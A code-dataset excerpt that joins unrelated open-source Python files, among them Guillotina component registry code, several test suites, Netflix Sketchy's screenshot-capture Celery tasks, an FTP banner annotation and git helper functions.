return result
class DebugGuillotinaAdapterLookup(GuillotinaAdapterLookup): # pragma: no cover
@profilable
async def asubscribers(self, objects, provided):
from guillotina.utils import get_current_request, get_authenticated_user_id, get_dotted_name
from guillotina.exceptions import RequestNotFound
from guillotina import task_vars
if len(objects) > 1:
event = get_dotted_name(objects[1])
context = getattr(objects[0], "__uuid__", None)
else:
event = get_dotted_name(objects[0])
context = None
try:
request = get_current_request()
except RequestNotFound:
request = None
try:
url = request.url.human_repr()
except AttributeError:
# older version of aiohttp
url = ""
info = {
"url": url,
"container": getattr(task_vars.container.get(), "id", None),
"user": get_authenticated_user_id(),
"db_id": getattr(task_vars.db.get(), "id", None),
"request_uid": getattr(request, "_uid", None),
"method": getattr(request, "method", None),
"subscribers": [],
"context": context,
"event": event,
}
start = time.time() * 1000
subscriptions = sorted(
self.subscriptions(map(providedBy, objects), provided),
key=lambda sub: getattr(sub, "priority", 100),
)
info["lookup_time"] = (time.time() * 1000) - start
info["found"] = len(subscriptions)
results = []
for subscription in subscriptions:
start = time.time() * 1000
if asyncio.iscoroutinefunction(subscription):
results.append(await subscription(*objects))
else:
results.append(subscription(*objects))
info["subscribers"].append(
{"duration": (time.time() * 1000) - start, "name": get_dotted_name(subscription)}
)
info["duration"] = (time.time() * 1000) - start
profile_logger.info(info)
return results
class GuillotinaAdapterRegistry(AdapterRegistry):
"""
Customized adapter registry for async
"""
LookupClass: Type[GuillotinaAdapterLookup]
_delegated = AdapterRegistry._delegated + ("asubscribers",) # type: ignore
if os.environ.get("GDEBUG_SUBSCRIBERS", "").lower() in ("1", "true", "t"):
LookupClass = DebugGuillotinaAdapterLookup
else:
LookupClass = GuillotinaAdapterLookup
def __init__(self, parent, name):
self.__parent__ = parent
self.__name__ = name
super().__init__()
@implementer(IComponentLookup)
class GlobalComponents(Components): # type: ignore
def _init_registries(self):
self.adapters = GuillotinaAdapterRegistry(self, "adapters")
self.utilities = GuillotinaAdapterRegistry(self, "utilities")
def __reduce__(self):
# Global site managers are pickled as global objects
return self.__name__
base = GlobalComponents("base")
def get_global_components():
return base
def reset():
global base
base = GlobalComponents("base")
def provide_utility(component, provides=None, name=_BLANK):
base.registerUtility(component, provides, name, event=False)
def provide_adapter(factory, adapts=None, provides=None, name=_BLANK):
base.registerAdapter(factory, adapts, provides, name, event=False)
def provide_subscription_adapter(factory, adapts=None, provides=None):
base.registerSubscriptionAdapter(factory, adapts, provides, event=False)
def provide_handler(factory, adapts=None):
base.registerHandler(factory, adapts, event=False)
|
tests/test_mask_utils_detectron2.py | mintar/mseg-api | 213 | 11096279 | <filename>tests/test_mask_utils_detectron2.py
#!/usr/bin/env python3
import cv2
import matplotlib.pyplot as plt
import numpy as np
from mseg.utils.mask_utils_detectron2 import Visualizer
def test_visualizer1() -> None:
"""
label map with four quadrants.
| Sky | Road |
----------------
| Person | Horse |
"""
H = 640
W = 480
img_rgb = np.ones((H, W, 3), dtype=np.uint8)
label_map = np.zeros((H, W), dtype=np.uint8)
label_map[: H // 2, : W // 2] = 0
label_map[: H // 2, W // 2 :] = 1
label_map[H // 2 :, : W // 2] = 2
label_map[H // 2 :, W // 2 :] = 3
id_to_class_name_map = {0: "sky", 1: "road", 2: "person", 3: "horse"}
vis_obj = Visualizer(img_rgb, None)
output_img = vis_obj.overlay_instances(label_map, id_to_class_name_map)
plt.imshow(output_img)
# plt.show()
plt.close("all")
def test_visualizer2() -> None:
"""
Create label map with two embedded circles. Each circle
represents class 1 (the "person" class).
"""
H = 640
W = 480
img_rgb = np.ones((H, W, 3), dtype=np.uint8)
label_map = np.zeros((H, W), dtype=np.uint8)
label_map[100, 300] = 1
label_map[100, 100] = 1
# only 2 pixels will have value 1
mask_diff = np.ones_like(label_map).astype(np.uint8) - label_map
# Calculates the distance to the closest zero pixel for each pixel of the source image.
distance_mask = cv2.distanceTransform(
mask_diff, distanceType=cv2.DIST_L2, maskSize=cv2.DIST_MASK_PRECISE
)
distance_mask = distance_mask.astype(np.float32)
label_map = (distance_mask <= 25).astype(np.uint8)
id_to_class_name_map = {0: "road", 1: "person"}
# plt.imshow(label_map)
# plt.show()
vis_obj = Visualizer(img_rgb, None)
output_img = vis_obj.overlay_instances(label_map, id_to_class_name_map)
plt.imshow(output_img)
# plt.show()
plt.close("all")
"""
TODO: add more tests, e.g. with concentric circles
"""
if __name__ == "__main__":
test_visualizer1()
# test_visualizer2()
|
sdk-extension/opentelemetry-sdk-extension-aws/tests/resource/test_ecs.py | willarmiros/opentelemetry-python-contrib | 208 | 11096289 | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from collections import OrderedDict
from unittest.mock import mock_open, patch
from opentelemetry.sdk.extension.aws.resource.ecs import AwsEcsResourceDetector
from opentelemetry.semconv.resource import (
CloudPlatformValues,
CloudProviderValues,
ResourceAttributes,
)
MockEcsResourceAttributes = {
ResourceAttributes.CLOUD_PROVIDER: CloudProviderValues.AWS.value,
ResourceAttributes.CLOUD_PLATFORM: CloudPlatformValues.AWS_ECS.value,
ResourceAttributes.CONTAINER_NAME: "mock-container-name",
ResourceAttributes.CONTAINER_ID: "a4d00c9dd675d67f866c786181419e1b44832d4696780152e61afd44a3e02856",
}
class AwsEcsResourceDetectorTest(unittest.TestCase):
@patch.dict(
"os.environ", {"ECS_CONTAINER_METADATA_URI": "mock-uri"}, clear=True,
)
@patch(
"socket.gethostname",
return_value=f"{MockEcsResourceAttributes[ResourceAttributes.CONTAINER_NAME]}",
)
@patch(
"builtins.open",
new_callable=mock_open,
read_data=f"""14:name=systemd:/docker/{MockEcsResourceAttributes[ResourceAttributes.CONTAINER_ID]}
13:rdma:/
12:pids:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
11:hugetlb:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
10:net_prio:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
9:perf_event:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
8:net_cls:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
7:freezer:/docker/
6:devices:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
5:memory:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
4:blkio:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
3:cpuacct:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
2:cpu:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
1:cpuset:/docker/bogusContainerIdThatShouldNotBeOneSetBecauseTheFirstOneWasPicked
""",
)
def test_simple_create(self, mock_open_function, mock_socket_gethostname):
actual = AwsEcsResourceDetector().detect()
self.assertDictEqual(
actual.attributes.copy(), OrderedDict(MockEcsResourceAttributes)
)
|
tests/components/homekit/conftest.py | MrDelik/core | 30,023 | 11096302 | """HomeKit session fixtures."""
from contextlib import suppress
import os
from unittest.mock import patch
from pyhap.accessory_driver import AccessoryDriver
import pytest
from homeassistant.components.device_tracker.legacy import YAML_DEVICES
from homeassistant.components.homekit.const import EVENT_HOMEKIT_CHANGED
from tests.common import async_capture_events, mock_device_registry, mock_registry
@pytest.fixture
def hk_driver(loop):
"""Return a custom AccessoryDriver instance for HomeKit accessory init."""
with patch("pyhap.accessory_driver.AsyncZeroconf"), patch(
"pyhap.accessory_driver.AccessoryEncoder"
), patch("pyhap.accessory_driver.HAPServer.async_stop"), patch(
"pyhap.accessory_driver.HAPServer.async_start"
), patch(
"pyhap.accessory_driver.AccessoryDriver.publish"
), patch(
"pyhap.accessory_driver.AccessoryDriver.persist"
):
yield AccessoryDriver(pincode=b"123-45-678", address="127.0.0.1", loop=loop)
@pytest.fixture
def mock_hap(loop, mock_zeroconf):
"""Return a custom AccessoryDriver instance for HomeKit accessory init."""
with patch("pyhap.accessory_driver.AsyncZeroconf"), patch(
"pyhap.accessory_driver.AccessoryEncoder"
), patch("pyhap.accessory_driver.HAPServer.async_stop"), patch(
"pyhap.accessory_driver.HAPServer.async_start"
), patch(
"pyhap.accessory_driver.AccessoryDriver.publish"
), patch(
"pyhap.accessory_driver.AccessoryDriver.async_start"
), patch(
"pyhap.accessory_driver.AccessoryDriver.async_stop"
), patch(
"pyhap.accessory_driver.AccessoryDriver.persist"
):
yield AccessoryDriver(pincode=b"123-45-678", address="127.0.0.1", loop=loop)
@pytest.fixture
def events(hass):
"""Yield caught homekit_changed events."""
return async_capture_events(hass, EVENT_HOMEKIT_CHANGED)
@pytest.fixture(name="device_reg")
def device_reg_fixture(hass):
"""Return an empty, loaded, registry."""
return mock_device_registry(hass)
@pytest.fixture(name="entity_reg")
def entity_reg_fixture(hass):
"""Return an empty, loaded, registry."""
return mock_registry(hass)
@pytest.fixture
def demo_cleanup(hass):
"""Clean up device tracker demo file."""
yield
with suppress(FileNotFoundError):
os.remove(hass.config.path(YAML_DEVICES))
|
tests/test_ast.py | odinsemvosem/SKompiler | 112 | 11096320 | <reponame>odinsemvosem/SKompiler<gh_stars>100-1000
#pylint: disable=wildcard-import,unused-wildcard-import,no-member
import numpy as np
from skompiler.ast import *
from skompiler.dsl import *
def test_dsl():
assert isinstance(ident('x'), Identifier)
assert isinstance(ident('x', 1), VectorIdentifier)
assert isinstance(const(1), NumberConstant)
assert isinstance(const([1]), VectorConstant)
assert isinstance(const([[1]]), MatrixConstant)
assert isinstance(const(np.array([1], dtype='int')[0]), NumberConstant)
assert isinstance(const(np.array(1)), NumberConstant)
mtx = const(np.array([[1, 2]]))
assert isinstance(mtx, MatrixConstant)
assert len(mtx) == 1
v = mtx[0]
assert isinstance(v, VectorConstant)
assert len(v) == 2
n = v[1]
assert isinstance(n, NumberConstant)
assert n.value == 2
ids = vector(map(ident, 'abc'))
assert isinstance(ids, MakeVector)
assert len(ids.elems) == 3
assert isinstance(ids.elems[0], Identifier)
def test_singleton():
assert Add() is Add()
assert func.Add is Add()
assert func.Mul is Mul()
|
sketchy/controllers/tasks.py | fakeNetflix/sketchy | 790 | 11096321 | # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import boto
import lxml.html as LH
import lxml.html.clean as clean
import os
import re
import json
import requests
from requests.exceptions import ConnectionError
from requests import post
from boto.s3.key import Key
from boto.s3.connection import OrdinaryCallingFormat
from subprocess32 import PIPE
from collections import defaultdict
from sketchy import db, app, celery
from sketchy.models.capture import Capture
from sketchy.models.static import Static
from sketchy.controllers.validators import grab_domain
import subprocess32
import socket
import netaddr
@celery.task(name='check_url', bind=True)
def check_url(self, capture_id=0, retries=0, model='capture'):
"""
Check if a URL exists without downloading the whole file.
We only check the URL header.
"""
# check for env variable for session cookies
cookies = {}
try:
cookies = dict(item.split("=") for item in os.getenv('phantomjs_cookies').split(" "))
except:
pass
capture_record = Capture.query.filter(Capture.id == capture_id).first()
capture_record.job_status = 'STARTED'
# Write the number of retries to the capture record
db.session.add(capture_record)
capture_record.retry = retries
db.session.commit()
# Only retrieve the headers of the request, and return response code
try:
response = ""
verify_ssl = app.config['SSL_HOST_VALIDATION']
response = requests.get(capture_record.url, verify=verify_ssl, allow_redirects=False, timeout=5, headers={"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0"}, cookies=cookies)
capture_record.url_response_code = response.status_code
if capture_record.status_only:
capture_record.job_status = 'COMPLETED'
capture_record.capture_status = '%s HTTP STATUS CODE' % (response.status_code)
if capture_record.callback:
finisher(capture_record)
else:
capture_record.capture_status = '%s HTTP STATUS CODE' % (response.status_code)
# If URL doesn't return a valid status code or times out, raise an exception
except Exception as err:
capture_record.job_status = 'RETRY'
capture_record.capture_status = str(err)
capture_record.url_response_code = 0
check_url.retry(kwargs={'capture_id': capture_id, 'retries': capture_record.retry + 1, 'model': model}, exc=err, countdown=app.config['COOLDOWN'], max_retries=app.config['MAX_RETRIES'])
# If the code was not a good code, record the status as a 404 and raise an exception
finally:
db.session.commit()
return str(response.status_code)
def do_capture(status_code, the_record, base_url, model='capture', phantomjs_timeout=app.config['PHANTOMJS_TIMEOUT']):
"""
Create a screenshot, text scrape, from a provided html file.
This depends on phantomjs and an associated javascript file to perform the captures.
In the event an error occurs, an exception is raised and handled by the celery task
or the controller that called this method.
"""
# Make sure the the_record
db.session.add(the_record)
# If the capture is for static content, use a different PhantomJS config file
if model == 'static':
capture_name = the_record.filename
service_args = [
app.config['PHANTOMJS'],
'--ssl-protocol=any',
'--ignore-ssl-errors=yes',
os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + '/assets/static.js',
app.config['LOCAL_STORAGE_FOLDER'],
capture_name]
content_to_parse = os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name)
else:
capture_name = grab_domain(the_record.url) + '_' + str(the_record.id)
service_args = [
app.config['PHANTOMJS'],
'--ssl-protocol=any',
'--ignore-ssl-errors=yes',
os.path.dirname(os.path.dirname(os.path.abspath(__file__))) + '/assets/capture.js',
the_record.url,
os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name)]
content_to_parse = os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name + '.html')
# Using subprocess32 backport, call phantom and if process hangs kill it
pid = subprocess32.Popen(service_args, stdout=PIPE, stderr=PIPE)
try:
stdout, stderr = pid.communicate(timeout=phantomjs_timeout)
except subprocess32.TimeoutExpired:
pid.kill()
stdout, stderr = pid.communicate()
app.logger.error('PhantomJS Capture timeout at {} seconds'.format(phantomjs_timeout))
raise subprocess32.TimeoutExpired('phantomjs capture',phantomjs_timeout)
# If the subprocess has an error, raise an exception
if stderr or stdout:
raise Exception("{}{}".format(stdout, stderr))
# Strip tags and parse out all text
ignore_tags = ('script', 'noscript', 'style')
with open(content_to_parse, 'r') as content_file:
content = content_file.read()
cleaner = clean.Cleaner()
content = cleaner.clean_html(content)
doc = LH.fromstring(content)
output = ""
for elt in doc.iterdescendants():
if elt.tag in ignore_tags:
continue
text = elt.text or ''
tail = elt.tail or ''
wordz = " ".join((text, tail)).strip('\t')
if wordz and len(wordz) >= 2 and not re.match("^[ \t\n]*$", wordz):
output += wordz.encode('utf-8')
# Since the filename format is different for static captures, update the filename
# This will ensure the URLs are pointing to the correct resources
if model == 'static':
capture_name = capture_name.split('.')[0]
# Wite our html text that was parsed into our capture folder
parsed_text = open(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], capture_name + '.txt'), 'wb')
parsed_text.write(output)
# Update the sketch record with the local URLs for the sketch, scrape, and html captures
the_record.sketch_url = base_url + '/files/' + capture_name + '.png'
the_record.scrape_url = base_url + '/files/' + capture_name + '.txt'
the_record.html_url = base_url + '/files/' + capture_name + '.html'
# Create a dict that contains what files may need to be written to S3
files_to_write = defaultdict(list)
files_to_write['sketch'] = capture_name + '.png'
files_to_write['scrape'] = capture_name + '.txt'
files_to_write['html'] = capture_name + '.html'
# If we are not writing to S3, update the capture_status that we are completed.
if not app.config['USE_S3']:
the_record.job_status = "COMPLETED"
the_record.capture_status = "LOCAL_CAPTURES_CREATED"
else:
the_record.capture_status = "LOCAL_CAPTURES_CREATED"
db.session.commit()
return files_to_write
def s3_save(files_to_write, the_record):
"""
Write a sketch, scrape, and html file to S3
"""
db.session.add(the_record)
# These are the content-types for the files S3 will be serving up
response_types = {'sketch': 'image/png', 'scrape': 'text/plain', 'html': 'text/html'}
# Iterate through each file we need to write to s3
for capture_type, file_name in files_to_write.items():
# Connect to S3, generate Key, set path based on capture_type, write file to S3
conn = boto.s3.connect_to_region(
region_name = app.config.get('S3_BUCKET_REGION_NAME'),
calling_format = boto.s3.connection.OrdinaryCallingFormat()
)
key = Key(conn.get_bucket(app.config.get('S3_BUCKET_PREFIX')))
path = "sketchy/{}/{}".format(capture_type, file_name)
key.key = path
key.set_contents_from_filename(app.config['LOCAL_STORAGE_FOLDER'] + '/' + file_name)
# Generate a URL for downloading the files
url = conn.generate_url(
app.config.get('S3_LINK_EXPIRATION'),
'GET',
bucket=app.config.get('S3_BUCKET_PREFIX'),
key=key.key,
response_headers={
'response-content-type': response_types[capture_type],
'response-content-disposition': 'attachment; filename=' + file_name
})
# Generate appropriate url based on capture_type
if capture_type == 'sketch':
the_record.sketch_url = str(url)
if capture_type == 'scrape':
the_record.scrape_url = str(url)
if capture_type == 'html':
the_record.html_url = str(url)
# Remove local files if we are saving to S3
os.remove(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], files_to_write['sketch']))
os.remove(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], files_to_write['scrape']))
os.remove(os.path.join(app.config['LOCAL_STORAGE_FOLDER'], files_to_write['html']))
# If we don't have a finisher task is complete
if the_record.callback:
the_record.capture_status = 'S3_ITEMS_SAVED'
else:
the_record.capture_status = 'S3_ITEMS_SAVED'
the_record.job_status = 'COMPLETED'
db.session.commit()
def finisher(the_record):
"""
POST finished chain to a callback URL provided
"""
db.session.add(the_record)
verify_ssl = app.config['SSL_HOST_VALIDATION']
# Set the correct headers for the postback
headers = {'Content-type': 'application/json', 'Accept': 'text/plain', 'Connection': 'close'}
#proxy = {"http": "127.0.0.1:8080"}
try:
# Blacklist IP addresses
ip_addr = socket.gethostbyname(grab_domain(the_record.url))
if app.config['IP_BLACKLISTING']:
if netaddr.all_matching_cidrs(ip_addr, app.config['IP_BLACKLISTING_RANGE'].split(',')):
the_record.capture_status = "IP BLACKLISTED:{} - ".format(ip_addr) + the_record.capture_status
except:
pass
req = post(the_record.callback, verify=verify_ssl, data=json.dumps(the_record.as_dict()), headers=headers)
# If a 4xx or 5xx status is received, raise an exception
req.raise_for_status()
# Update capture_record and save to database
the_record.job_status = 'COMPLETED'
# Removed to propagate blacklist message
#the_record.capture_status = 'CALLBACK_SUCCEEDED'
db.session.add(the_record)
db.session.commit()
@celery.task(name='celery_static_capture', ignore_result=True, bind=True)
def celery_static_capture(self, base_url, capture_id=0, retries=0, model="static"):
"""
Celery task used to create a sketch and scrape with a provided static HTML file.
Task also writes files to S3 or posts a callback depending on configuration file.
"""
static_record = Static.query.filter(Static.id == capture_id).first()
# Write the number of retries to the capture record
db.session.add(static_record)
static_record.retry = retries
db.session.commit()
# First perform the captures, then either write to S3, perform a callback, or neither
try:
# call the main capture function to retrieve sketches and scrapes
files_to_write = do_capture(0, static_record, base_url, model='static')
# Call the s3 save function if s3 is configured, and perform callback if configured.
if app.config['USE_S3']:
if static_record.callback:
s3_save(files_to_write, static_record)
finisher(static_record)
else:
s3_save(files_to_write, static_record)
elif static_record.callback:
finisher(static_record)
# Only execute retries on ConnectionError exceptions, otherwise fail immediately
except ConnectionError as err:
app.logger.error(err)
static_record.job_status = 'RETRY'
static_record.capture_status = str(err)
static_record.retry = retries + 1
db.session.commit()
raise celery_static_capture.retry(args=[base_url],
kwargs={'capture_id' :capture_id, 'retries': static_record.retry + 1, 'model': 'static'}, exc=err,
countdown=app.config['COOLDOWN'],
max_retries=app.config['MAX_RETRIES'])
# Catch exceptions raised by any functions called
except Exception as err:
app.logger.error(err)
static_record.job_status = 'FAILURE'
if str(err):
static_record.capture_status = str(err)
raise Exception
finally:
db.session.commit()
@celery.task(name='celery_capture', ignore_result=True, bind=True)
def celery_capture(self, status_code, base_url, capture_id=0, retries=0, model="capture", phantomjs_timeout=app.config['PHANTOMJS_TIMEOUT']):
"""
Celery task used to create sketch, scrape, html.
Task also writes files to S3 or posts a callback depending on configuration file.
"""
capture_record = Capture.query.filter(Capture.id == capture_id).first()
# Write the number of retries to the capture record
db.session.add(capture_record)
capture_record.retry = retries
db.session.commit()
try:
# Perform a callback or complete the task depending on error code and config
if capture_record.url_response_code > 400 and app.config['CAPTURE_ERRORS'] == False:
if capture_record.callback:
finisher(capture_record)
else:
capture_record.job_status = 'COMPLETED'
return True
# Only execute retries on ConnectionError exceptions, otherwise fail immediately
except ConnectionError as err:
app.logger.error(err)
capture_record.job_status = 'RETRY'
capture_record.capture_status = str(err)
capture_record.retry = retries + 1
raise celery_capture.retry(args=[status_code, base_url],
kwargs = { 'capture_id' :capture_id, 'retries': capture_record.retry + 1, 'model': 'capture'}, exc=err,
countdown=app.config['COOLDOWN'],
max_retries=app.config['MAX_RETRIES'])
except Exception as err:
app.logger.error(err)
capture_record.job_status = 'FAILURE'
if str(err):
capture_record.capture_status = str(err)
capture_record.capture_status = str(err)
finally:
db.session.commit()
# First perform the captures, then either write to S3, perform a callback, or neither
try:
# call the main capture function to retrieve sketches, scrapes, and html
files_to_write = do_capture(status_code, capture_record, base_url, model='capture', phantomjs_timeout=phantomjs_timeout)
# Call the s3 save function if s3 is configured, and perform callback if configured.
if app.config['USE_S3']:
if capture_record.callback:
s3_save(files_to_write, capture_record)
finisher(capture_record)
else:
s3_save(files_to_write, capture_record)
elif capture_record.callback:
finisher(capture_record)
# If the screenshot generation timed out, try to render again
except subprocess32.TimeoutExpired as err:
app.logger.error(err)
capture_record.job_status = 'RETRY'
capture_record.capture_status = str(err)
capture_record.retry = retries + 1
raise celery_capture.retry(args=[status_code, base_url],
kwargs={'capture_id' :capture_id, 'retries': capture_record.retry, 'model': 'capture', 'phantomjs_timeout': (capture_record.retry * 5) + phantomjs_timeout}, exc=err,
countdown=app.config['COOLDOWN'],
max_retries=app.config['MAX_RETRIES'])
# Retry on connection error exceptions
except ConnectionError as err:
app.logger.error(err)
capture_record.job_status = 'RETRY'
capture_record.capture_status = str(err)
capture_record.retry = retries + 1
raise celery_capture.retry(args=[status_code, base_url],
kwargs={'capture_id' :capture_id, 'retries': capture_record.retry, 'model': 'capture'}, exc=err,
countdown=app.config['COOLDOWN'],
max_retries=app.config['MAX_RETRIES'])
# For all other exceptions, fail immediately
except Exception as err:
app.logger.error(err)
if str(err):
capture_record.capture_status = str(err)
capture_record.job_status = 'FAILURE'
raise Exception
finally:
db.session.commit()
|
utils/gyb_benchmark_support.py | francisvm/swift | 427 | 11096330 | <reponame>francisvm/swift
# ===--- gyb_benchmark_support.py --------------------*- coding: utf-8 -*-===//
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
import os
import re
script_dir = os.path.dirname(os.path.realpath(__file__))
perf_dir = os.path.realpath(os.path.join(script_dir, '../benchmark'))
single_source_dir = os.path.join(perf_dir, 'single-source')
multi_source_dir = os.path.join(perf_dir, 'multi-source')
def all_files(directory, extension): # matching: [directory]/**/*[extension]
return [
os.path.join(root, f)
for root, _, files in os.walk(directory)
for f in files if f.endswith(extension)
]
# CMakeList single-source
test_files = all_files(single_source_dir, '.swift')
tests = sorted(os.path.basename(x).split('.')[0] for x in test_files)
# CMakeList multi-source
class MultiSourceBench(object):
def __init__(self, path):
self.name = os.path.basename(path)
self.files = [x for x in os.listdir(path)
if x.endswith('.swift')]
multisource_benches = [
MultiSourceBench(os.path.join(multi_source_dir, x))
for x in os.listdir(multi_source_dir)
if os.path.isdir(os.path.join(multi_source_dir, x))
] if os.path.isdir(multi_source_dir) else []
def get_run_funcs(filepath):
content = open(filepath).read()
return re.findall(r'func run_(.*?)\(', content)
def find_run_funcs():
swift_files = all_files(single_source_dir, '.swift')
swift_files += all_files(multi_source_dir, '.swift')
return sorted([func for f in swift_files for func in get_run_funcs(f)])
all_run_funcs = find_run_funcs()
|
src/zeep/wsse/__init__.py | vascohenriques/python-zeep | 1,763 | 11096353 | <filename>src/zeep/wsse/__init__.py
from .compose import Compose # noqa
from .signature import BinarySignature, MemorySignature, Signature # noqa
from .username import UsernameToken # noqa
|
tableschema/types/duration.py | vincentchevrier/tableschema-py | 224 | 11096374 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import six
import datetime
import isodate
from ..config import ERROR
# Module API
def cast_duration(format, value, **options):
if not isinstance(value, (isodate.Duration, datetime.timedelta)):
if not isinstance(value, six.string_types):
return ERROR
try:
value = isodate.parse_duration(value)
except Exception:
return ERROR
return value
|
src/vm_test.py | laubonghaudoi/Cantonese | 1,188 | 11096401 | <reponame>laubonghaudoi/Cantonese
import register_vm as r_vm
import stack_vm as s_vm
def test_register_vm() -> None:
CantoneseState = r_vm.CanState("")
CantoneseState.push_boolean(True)
CantoneseState.dump()
CantoneseState.push_integer(10)
CantoneseState.dump()
CantoneseState.push_null()
CantoneseState.dump()
CantoneseState.push_string("Hello World")
CantoneseState.dump()
CantoneseState.push_value(-4)
CantoneseState.dump()
CantoneseState.replace(3)
CantoneseState.dump()
CantoneseState.set_top(6)
CantoneseState.dump()
CantoneseState.remove(-3)
CantoneseState.dump()
CantoneseState.set_top(-5)
CantoneseState.dump()
def test_stack_vm() -> None:
ins = [
s_vm.Instruction(1, "OP_LOAD_NAME", 0),
s_vm.Instruction(2, "OP_LOAD_CONST", 0),
s_vm.Instruction(3, "OP_CALL_FUNCTION", 1),
s_vm.Instruction(4, "OP_RETURN", 0)
]
code = s_vm.Code()
code.ins_lst = ins
code.co_consts = {0 : ['string', ' " Hello World " ']}
code.co_names = {0 : 'print'}
cs = s_vm.CanState(code)
cs._run()
if __name__ == '__main__':
print("test register vm:")
test_register_vm()
print("test stack vm:")
test_stack_vm() |
ztag/annotations/FtpSoftAtHome.py | justinbastress/ztag | 107 | 11096424 | <reponame>justinbastress/ztag
import re
from ztag.annotation import Manufacturer
from ztag.annotation import Annotation
from ztag.annotation import Type
from ztag.annotation import OperatingSystem
from ztag import protocols
import ztag.test
class FtpSoftAtHome(Annotation):
protocol = protocols.FTP
subprotocol = protocols.FTP.BANNER
port = None
manufact_re = re.compile(
"^220---------- Welcome to SoftAtHome FTP Server",
re.IGNORECASE
)
tests = {
"FtpSoftAtHome_1": {
"global_metadata": {
"manufacturer": Manufacturer.SOFT_AT_HOME,
},
"local_metadata": {
"product": "SoftAtHome Framework"
}
}
}
def process(self, obj, meta):
banner = obj["banner"]
if self.manufact_re.search(banner):
meta.global_metadata.manufacturer = Manufacturer.SOFT_AT_HOME
meta.local_metadata.product = "SoftAtHome Framework"
return meta
""" Tests
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:31. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:31. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:32. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 01:33. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:34. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:34. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"220---------- Welcome to SoftAtHome FTP Server [privsep] ---------\r\n220-You are user number 1 of 32 allowed.\r\n220-Local time is now 00:35. Server port: 21.\r\n220-This is a private system - No anonymous login\r\n220-IPv6 connections are also welcome on this server.\r\n220 You will be disconnected after 10 minutes of inactivity.\r\n"
"""
|
src/scriv/gitinfo.py | kurtmckee/scriv | 110 | 11096438 | <filename>src/scriv/gitinfo.py
"""Get information from git."""
import logging
import os
import subprocess
import sys
from pathlib import Path
import click
from .shell import run_command, run_simple_command
logger = logging.getLogger()
def user_nick() -> str:
"""
Get a short name for the current user.
"""
ok, out = run_command("git config --get github.user")
if ok:
return out.strip()
ok, out = run_command("git config --get user.email")
if ok:
nick = out.partition("@")[0]
return nick
return os.getenv("USER", "somebody")
def current_branch_name() -> str:
"""
Get the current branch name.
"""
return run_simple_command("git rev-parse --abbrev-ref HEAD")
def git_config(option: str) -> str:
"""
Return a git config value.
"""
return run_simple_command("git config --get {}".format(option))
